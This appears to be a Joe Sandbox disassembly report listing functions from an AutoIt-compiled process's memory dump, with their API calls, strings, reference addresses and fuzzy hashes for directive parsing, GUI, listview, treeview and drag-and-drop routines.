Bad directive syntax error, xrefs: 00C3FB53, 00C3FB70
Unterminated group of comments, xrefs: 00C3FC7A
#OnAutoItStartRegister, xrefs: 00C028A8
#cs, xrefs: 00C02904, 00C02956
', xrefs: 00C3FB1F
#notrayicon, xrefs: 00C02878
#comments-end, xrefs: 00C0296A
#comments-start, xrefs: 00C028F0, 00C02942
#ce, xrefs: 00C0297E
Cannot parse #include, xrefs: 00C3FC65
#include, xrefs: 00C028D8

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: bd4c9b6c3a2711214e11640b028c609957186add0001fe3273159382eb254b44
Instruction ID: a3b6f39dbf14596d9ef43f52584d8d47b37cfb3ceb1c162f29e16007bbbcd712
Opcode Fuzzy Hash: bd4c9b6c3a2711214e11640b028c609957186add0001fe3273159382eb254b44
Instruction Fuzzy Hash: 57A1C031A04209BBCB24BF61CC46EBE77B4AF45704F144129F815AB2D2EBB09F52EB50

Function 014C90C2 Relevance: 39.3, APIs: 26, Instructions: 259COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 014C90C9
std::_Lockit::_Lockit.LIBCPMT ref: 014C90D3

Part of subcall function 01402420: std::_Lockit::_Lockit.LIBCPMT ref: 0140243D
Part of subcall function 01402420: std::_Lockit::~_Lockit.LIBCPMT ref: 01402459

numpunct.LIBCPMT ref: 014C910D
std::_Facet_Register.LIBCPMT ref: 014C9124
std::_Lockit::~_Lockit.LIBCPMT ref: 014C9144
Concurrency::cancel_current_task.LIBCPMT ref: 014C9151
__EH_prolog3.LIBCMT ref: 014C915E
std::_Lockit::_Lockit.LIBCPMT ref: 014C9168
std::_Lockit::~_Lockit.LIBCPMT ref: 014C91D9

Part of subcall function 014CA5FE: __EH_prolog3.LIBCMT ref: 014CA605
Part of subcall function 014CA5FE: numpunct.LIBCPMT ref: 014CA64B

std::_Facet_Register.LIBCPMT ref: 014C91B9

Part of subcall function 014CA66A: __EH_prolog3.LIBCMT ref: 014CA671
Part of subcall function 014CA66A: numpunct.LIBCPMT ref: 014CA6B7

Concurrency::cancel_current_task.LIBCPMT ref: 014C91E6
__EH_prolog3.LIBCMT ref: 014C91F3
std::_Lockit::_Lockit.LIBCPMT ref: 014C91FD
std::_Facet_Register.LIBCPMT ref: 014C924E

Part of subcall function 014CA6D6: __EH_prolog3.LIBCMT ref: 014CA6DD

std::_Lockit::~_Lockit.LIBCPMT ref: 014C926E
Concurrency::cancel_current_task.LIBCPMT ref: 014C927B
__EH_prolog3.LIBCMT ref: 014C9288
std::_Lockit::_Lockit.LIBCPMT ref: 014C9292
std::_Facet_Register.LIBCPMT ref: 014C92E3

Part of subcall function 014CA74A: __EH_prolog3.LIBCMT ref: 014CA751

std::_Lockit::~_Lockit.LIBCPMT ref: 014C9303
Concurrency::cancel_current_task.LIBCPMT ref: 014C9310
__EH_prolog3.LIBCMT ref: 014C931D
std::_Lockit::_Lockit.LIBCPMT ref: 014C9327
std::_Facet_Register.LIBCPMT ref: 014C9378
std::_Lockit::~_Lockit.LIBCPMT ref: 014C9398
Concurrency::cancel_current_task.LIBCPMT ref: 014C93A5

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$numpunct
String ID:
API String ID: 2212333951-0
Opcode ID: 8ceb60c1790a7a4bf4ac22b7922ea36d9bbcae9ace0b13f41599390f1f109de5
Instruction ID: 2dacb290b82c4a17d698b7e65242dbea23c55e9535a911f60cf53ad2c1529080
Opcode Fuzzy Hash: 8ceb60c1790a7a4bf4ac22b7922ea36d9bbcae9ace0b13f41599390f1f109de5
Instruction Fuzzy Hash: 8F91137A900116ABCF15EFA5C454AAEB7B1BFB4B24F15440EE414AB3E0DF70DA04CB91

Function 00C547F7 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C54809
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C5482F
_wcscpy.LIBCMT ref: 00C5485D
_wcscmp.LIBCMT ref: 00C54868
_wcscat.LIBCMT ref: 00C5487E
_wcsstr.LIBCMT ref: 00C54889
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C548A5
_wcscat.LIBCMT ref: 00C548EE
_wcscat.LIBCMT ref: 00C548F5
_wcsncpy.LIBCMT ref: 00C54920

Strings

DefaultLangCodepage, xrefs: 00C54908
StringFileInfo\, xrefs: 00C54878
\VarFileInfo\Translation, xrefs: 00C5489D
04090000, xrefs: 00C548DB
%u.%u.%u.%u, xrefs: 00C54983

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: b996eca0422e9dbc5127cd366c8b61835b3a67874810654511b9c7ac6df3e574
Instruction ID: 018bbb9ae31e037f1f54a3b9292a589cb3e75a072dc800bf888dd51412522af1
Opcode Fuzzy Hash: b996eca0422e9dbc5127cd366c8b61835b3a67874810654511b9c7ac6df3e574
Instruction Fuzzy Hash: DA411775A002047BE714B7648C47EFF376CEF42315F100066F904A6192EB709AD2B7A9

Function 00BF2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF2C8C
GetSystemMetrics.USER32(00000007), ref: 00BF2C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF2CBF
GetSystemMetrics.USER32(00000008), ref: 00BF2CC7
GetSystemMetrics.USER32(00000004), ref: 00BF2CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF2D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF2D60
GetClientRect.USER32(00000000,000000FF), ref: 00BF2D7E
GetStockObject.GDI32(00000011), ref: 00BF2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF2DA5

Part of subcall function 00BF2714: GetCursorPos.USER32(?), ref: 00BF2727
Part of subcall function 00BF2714: ScreenToClient.USER32(00CB67B0,?), ref: 00BF2744
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2769
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2777

SetTimer.USER32(00000000,00000000,00000028,00BF1473), ref: 00BF2DCC

Strings

AutoIt v3 GUI, xrefs: 00BF2D44

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 308303f3fa46d16a7ead63a2577870a806e9aec4e717c7ea86836f341df1b524
Instruction ID: e31418ef71051b62e1714a3d8247fa1bebb7bd423b49e1b0835fdabc2e9a59e2
Opcode Fuzzy Hash: 308303f3fa46d16a7ead63a2577870a806e9aec4e717c7ea86836f341df1b524
Instruction Fuzzy Hash: DBB16D71A0020A9FDB14DFA8DC85BAD7BF4FB08314F204669FA15A72A0DB74A954CF64

Function 00C10354 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 348COMMON

Download Yara Rule

APIs

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

GetForegroundWindow.USER32(00C80980,?,?,?,?,?), ref: 00C1040E
IsWindow.USER32(?), ref: 00C464A0

Strings

CLASS, xrefs: 00C462CA
ACTIVE, xrefs: 00C4626D
TITLE, xrefs: 00C46435
REGEXPCLASS, xrefs: 00C462EB
INSTANCE, xrefs: 00C463DF
REGEXPTITLE, xrefs: 00C46299
ALL, xrefs: 00C46407
HANDLE, xrefs: 00C46283
LAST, xrefs: 00C46257

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 357c451f586d70234b237facb80210cdc43f804ec73fcdc369e7246628c0a887
Instruction ID: 413e5e7f020d565f4f5ec9a2bf273248f6e41d67ad069ed86c9698a4c8dc98f0
Opcode Fuzzy Hash: 357c451f586d70234b237facb80210cdc43f804ec73fcdc369e7246628c0a887
Instruction Fuzzy Hash: 75D1F8701046029BCF04EF20C4919AAFBB5BF56344F504A1DF4A6835A6DB70EE99EF93

Function 00C741E7 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C74274
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C74334

Strings

GETITEMCOUNT, xrefs: 00C742A6
SELECTINVERT, xrefs: 00C74404
SELECTCLEAR, xrefs: 00C743B3
GETSELECTEDCOUNT, xrefs: 00C74317
FINDITEM, xrefs: 00C744A7
SELECT, xrefs: 00C743CE
GETTEXT, xrefs: 00C742DD
GETSELECTED, xrefs: 00C74462
VIEWCHANGE, xrefs: 00C744F3
SELECTALL, xrefs: 00C7439B
GETSUBITEMCOUNT, xrefs: 00C742BF
DESELECT, xrefs: 00C74422
ISSELECTED, xrefs: 00C7433F

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: fd7b6a2636fb4028ee5110dbdba5cc02859a366aa1d914bd43aaa568422a02bc
Instruction ID: 858177c835e70b80afc00d115f66c3416b08ec9670bd089d635fd250db136003
Opcode Fuzzy Hash: fd7b6a2636fb4028ee5110dbdba5cc02859a366aa1d914bd43aaa568422a02bc
Instruction Fuzzy Hash: BFA182702142019FCB18EF20C851B7AB3E5FF85314F108968B96A9B3D2DB70ED49DB52

Function 00C4C97A Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00C4C98D
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C4C99F
SetWindowTextW.USER32(?,?), ref: 00C4C9B6
GetDlgItem.USER32(?,000003EA), ref: 00C4C9CB
SetWindowTextW.USER32(00000000,?), ref: 00C4C9D1
GetDlgItem.USER32(?,000003E9), ref: 00C4C9E1
SetWindowTextW.USER32(00000000,?), ref: 00C4C9E7
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C4CA08
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C4CA22
GetWindowRect.USER32(?,?), ref: 00C4CA2B
SetWindowTextW.USER32(?,?), ref: 00C4CA96
GetDesktopWindow.USER32 ref: 00C4CA9C
GetWindowRect.USER32(00000000), ref: 00C4CAA3
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C4CAEF
GetClientRect.USER32(?,?), ref: 00C4CAFC
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C4CB21
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C4CB4C

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: b08be3eab11128ef8cfe9348818455ee4f13484ec4d3b790de02345443af16f4
Instruction ID: 3d00c300ef8ae80334275ffcc8e8acc9fae90623bc57e15cbc1280eb264598ff
Opcode Fuzzy Hash: b08be3eab11128ef8cfe9348818455ee4f13484ec4d3b790de02345443af16f4
Instruction Fuzzy Hash: B8518C31A00709EFDB60DFA8CD89B6EBBF5FF04705F100928E596A25A0D774A914DB44

Function 00C7A5A6 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7A646
DestroyWindow.USER32(00000000,?), ref: 00C7A6C0

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C7A73A
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C7A75C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A76F
DestroyWindow.USER32(00000000), ref: 00C7A791
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00C7A7C8
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A7E1
GetDesktopWindow.USER32 ref: 00C7A7FA
GetWindowRect.USER32(00000000), ref: 00C7A801
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C7A819
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C7A831

Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC

Strings

tooltips_class32, xrefs: 00C7A733, 00C7A7C1
0, xrefs: 00C7A65C

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: b06dfd24d01673cb455aa25c3976093a947830cc81622e2c95a52f57104dc72c
Instruction ID: 67bfcb9306228ff6fd4254e500ebe1bb7b636119b6b4911483337b48971fc27e
Opcode Fuzzy Hash: b06dfd24d01673cb455aa25c3976093a947830cc81622e2c95a52f57104dc72c
Instruction Fuzzy Hash: 0871A871140201AFE725CF28CC48F6E7BE9FB88304F18861CF999872A1D775EA06DB56

Function 00C7CA21 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

DragQueryPoint.SHELL32(?,?), ref: 00C7CA4A

Part of subcall function 00C7AF24: ClientToScreen.USER32(?,?), ref: 00C7AF4D
Part of subcall function 00C7AF24: GetWindowRect.USER32(?,?), ref: 00C7AFC3
Part of subcall function 00C7AF24: PtInRect.USER32(?,?,00C7C437), ref: 00C7AFD3

SendMessageW.USER32(?,000000B0,?,?), ref: 00C7CAB3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C7CABE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C7CAE1
_wcscat.LIBCMT ref: 00C7CB11
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C7CB28
SendMessageW.USER32(?,000000B0,?,?), ref: 00C7CB41
SendMessageW.USER32(?,000000B1,?,?), ref: 00C7CB58
SendMessageW.USER32(?,000000B1,?,?), ref: 00C7CB7A
DragFinish.SHELL32(?), ref: 00C7CB81
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C7CC74

Strings

@GUI_DROPID, xrefs: 00C7CBA1
@GUI_DRAGFILE, xrefs: 00C7CC23
@GUI_DRAGID, xrefs: 00C7CBEC

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 6e63c2c6fc9e6cf3ea5621f6169f010026e1bf43db00f3935049b7699e2ebf0e
Instruction ID: 918d6e89823518c42013a3ccda4056cd1b819e423c20647241c60c13d634aa1d
Opcode Fuzzy Hash: 6e63c2c6fc9e6cf3ea5621f6169f010026e1bf43db00f3935049b7699e2ebf0e
Instruction Fuzzy Hash: 1C615971108301AFC711EF60DC85EAFBBE8EF89750F104A2DF695931A1DB719A49CB62

Function 00C58142 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378COMMON

Download Yara Rule

APIs

#8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,00C80980), ref: 00C58187
#10.WSOCK32(00000000,?,?,?,?,?,?,0000002A,00000000,00C80980), ref: 00C58190
#9.WSOCK32(00000000,?,?,?,?,?,0000002A,00000000,00C80980), ref: 00C5819C
#185.OLEAUT32(?,?,?,?,0000002A,00000000,00C80980), ref: 00C5828A
__swprintf.LIBCMT ref: 00C582BA
#220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00C582E6
#8.OLEAUT32(?,?,00000000,00000000), ref: 00C58397
#6.OLEAUT32(?,?), ref: 00C5842B
#9.WSOCK32(?), ref: 00C58485
#9.WSOCK32(?), ref: 00C58494
#8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 00C584D2

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C582B4
Default, xrefs: 00C58347

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: #185#220__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 2563594795-3931177956
Opcode ID: 3b5f36fb4b7ee2373589bb9f2328558a72ba1e008cdfd9a5fcdfd770fa7a44c6
Instruction ID: 84584cf34640f7ab24458007f0a615e9c8b4d73e95840951e18bb0f9821de7fb
Opcode Fuzzy Hash: 3b5f36fb4b7ee2373589bb9f2328558a72ba1e008cdfd9a5fcdfd770fa7a44c6
Instruction Fuzzy Hash: 8BD1EE39600916DBDB209F66C845B7EB7B4FF05742F248455EC14AB281CF34998DEBA8

Function 00C74797 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C74829
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C74874

Strings

GETITEMCOUNT, xrefs: 00C74956
SELECT, xrefs: 00C74A25
COLLAPSE, xrefs: 00C748BA
UNCHECK, xrefs: 00C74A50
GETSELECTED, xrefs: 00C74984
GETTEXT, xrefs: 00C749C7
CHECK, xrefs: 00C74894
EXPAND, xrefs: 00C74926
EXISTS, xrefs: 00C748DD
ISCHECKED, xrefs: 00C749F7
GETTOTALCOUNT, xrefs: 00C7485B

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4b6aad96457cb89b749f4d58b8d187f49adeaed95fa45da3ef5a12a487486fdc
Instruction ID: 69ee9421c7fc40ef0a1dd8a9647c28811d1e39cea7bc27bfe9c976f4e879fb43
Opcode Fuzzy Hash: 4b6aad96457cb89b749f4d58b8d187f49adeaed95fa45da3ef5a12a487486fdc
Instruction Fuzzy Hash: C99182742006019FCB08EF10C451A7EB7E5BF95354F5489A8F9AA5B392CB70ED49DB82

Function 00C5A0E8 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C5A12F

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C5A150
__swprintf.LIBCMT ref: 00C5A1A9
__swprintf.LIBCMT ref: 00C5A1C2
_wprintf.LIBCMT ref: 00C5A269
_wprintf.LIBCMT ref: 00C5A287

Strings

^ ERROR , xrefs: 00C5A1FE
"%s" (%d) : ==> %s:%s%s, xrefs: 00C5A264
"%s" (%d) : ==> %s:, xrefs: 00C5A282
Error: , xrefs: 00C5A231
Incorrect parameters to object property !, xrefs: 00C5A20B
Line %d (File "%s"):, xrefs: 00C5A1A3, 00C5A1BC

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
